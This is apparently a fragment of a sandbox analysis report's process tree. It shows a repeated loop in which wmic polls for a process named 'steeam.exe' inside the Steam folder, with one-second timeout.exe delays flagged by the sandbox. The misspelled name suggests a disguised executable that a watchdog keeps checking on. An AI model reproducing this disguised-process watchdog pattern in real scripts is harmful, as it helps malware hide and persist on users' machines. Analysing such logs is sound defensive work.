C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
